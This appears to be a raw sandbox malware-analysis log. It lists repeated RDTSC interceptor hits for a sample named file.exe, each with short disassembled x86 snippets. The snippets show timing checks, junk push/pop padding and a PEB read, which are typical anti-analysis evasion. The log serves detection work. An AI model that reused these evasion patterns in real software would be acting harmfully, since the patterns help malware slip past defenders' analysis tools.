Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAAD7 second address: DFAADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAADB second address: DFAAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAAE1 second address: DFAAE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB60A second address: DFB60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB60E second address: DFB637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F70F070E5D3h 0x0000000b pop edx 0x0000000c push ebx 0x0000000d jnp 00007F70F070E5D2h 0x00000013 jne 00007F70F070E5C6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB637 second address: DFB643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F70F0BCDB0Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0060E second address: E00614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00614 second address: E00618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC23 second address: E0FC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F70F070E5C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC2E second address: E0FC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F0BCDB11h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F0BCDB0Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC54 second address: E0FC5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE38 second address: E0DE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE3C second address: E0DE46 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE46 second address: E0DE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE4C second address: E0DE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE54 second address: E0DE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE58 second address: E0DE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E27F second address: E0E283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E283 second address: E0E298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E819 second address: E0E81F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E81F second address: E0E82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FAA5 second address: E0FAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FAAB second address: E0FAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FAB1 second address: E0FABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F70F0BCDB0Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1547B second address: E15481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15481 second address: E1549F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007F70F0BCDB19h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1549F second address: E154A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E154A4 second address: E154B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E154B0 second address: E154E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F70F070E5D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F70F070E5D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1577E second address: E15785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E23273 second address: E2328D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F70F070E5D0h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2328D second address: E23297 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E23297 second address: E2329D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2329D second address: E232AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E232AE second address: E232C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4421A second address: E44220 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44220 second address: E44226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42AF0 second address: E42AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42DD9 second address: E42DE7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E430B0 second address: E430B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43F7F second address: E43F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43F88 second address: E43F92 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43F92 second address: E43FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E490FF second address: E49103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A61A second address: E8A62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F70F070E5C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A62B second address: E8A635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A635 second address: E8A63F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A63F second address: E8A65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F70F0BCDB06h 0x0000000a jmp 00007F70F0BCDB16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A65F second address: E8A663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A663 second address: E8A69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F70F0BCDB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F70F0BCDB0Ah 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jnp 00007F70F0BCDB1Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E01 second address: E86E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E09 second address: E86E22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F70F0BCDB10h 0x0000000a pop ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E22 second address: E86E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F70F070E5D2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E33 second address: E86E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E39 second address: E86E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F070E5C8h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E45 second address: E86E4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E981D7 second address: E981F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F70F070E5C6h 0x0000000a jmp 00007F70F070E5CAh 0x0000000f popad 0x00000010 push ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jno 00007F70F070E5C6h 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E981F9 second address: E98208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98208 second address: E98210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98210 second address: E9821B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F70F0BCDB06h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9821B second address: E98223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98223 second address: E98227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98227 second address: E9822B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9822B second address: E98235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98235 second address: E98239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A914 second address: E9A918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60F3C second address: F60F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F602A3 second address: F602DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d jg 00007F70F0BCDB0Ch 0x00000013 pushad 0x00000014 jne 00007F70F0BCDB06h 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60B27 second address: F60B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60B2B second address: F60B53 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F0BCDB0Ah 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F70F0BCDB0Fh 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6383B second address: F63844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63844 second address: F63848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63AAD second address: F63AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63B76 second address: F63BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F70F0BCDB0Bh 0x00000011 call 00007F70F0BCDB16h 0x00000016 mov dword ptr [ebp+122D1C42h], ecx 0x0000001c pop edx 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F70F0BCDB08h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 sub dword ptr [ebp+12478A83h], ecx 0x0000003f call 00007F70F0BCDB09h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jbe 00007F70F0BCDB06h 0x0000004d jo 00007F70F0BCDB06h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63BF4 second address: F63C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70F070E5D0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jnp 00007F70F070E5C6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63C17 second address: F63C3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB08h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 jnc 00007F70F0BCDB0Ch 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63C3D second address: F63C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68E05 second address: F68E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68E0B second address: F68E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68E0F second address: F68E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68E17 second address: F68E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68E2D second address: F68E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260044 second address: 726004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726004A second address: 7260050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260050 second address: 72600C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 jmp 00007F70F070E5D0h 0x00000016 sub esp, 18h 0x00000019 jmp 00007F70F070E5D0h 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F70F070E5D0h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov bx, AB84h 0x0000002a pushad 0x0000002b mov edi, 3AADCBEEh 0x00000030 mov al, dh 0x00000032 popad 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F70F070E5CDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72600C6 second address: 72600CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72600CC second address: 72600D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72600D0 second address: 72600D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72600D4 second address: 72600E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72600E5 second address: 72600EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72600EB second address: 726012A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F70F070E5CBh 0x00000013 jmp 00007F70F070E5D3h 0x00000018 popfd 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726012A second address: 7260130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260130 second address: 7260134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260134 second address: 7260155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260155 second address: 7260238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F70F070E5D4h 0x00000011 jmp 00007F70F070E5D5h 0x00000016 popfd 0x00000017 popad 0x00000018 mov esi, dword ptr [759B06ECh] 0x0000001e jmp 00007F70F070E5CDh 0x00000023 test esi, esi 0x00000025 jmp 00007F70F070E5CEh 0x0000002a jne 00007F70F070F423h 0x00000030 pushad 0x00000031 jmp 00007F70F070E5CEh 0x00000036 mov edx, ecx 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a pushad 0x0000003b mov ecx, 408172F9h 0x00000040 call 00007F70F070E5D6h 0x00000045 jmp 00007F70F070E5D2h 0x0000004a pop eax 0x0000004b popad 0x0000004c push eax 0x0000004d pushad 0x0000004e mov edi, eax 0x00000050 pushfd 0x00000051 jmp 00007F70F070E5CAh 0x00000056 and eax, 199ACE68h 0x0000005c jmp 00007F70F070E5CBh 0x00000061 popfd 0x00000062 popad 0x00000063 xchg eax, edi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F70F070E5D5h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260238 second address: 726023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726023E second address: 7260242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
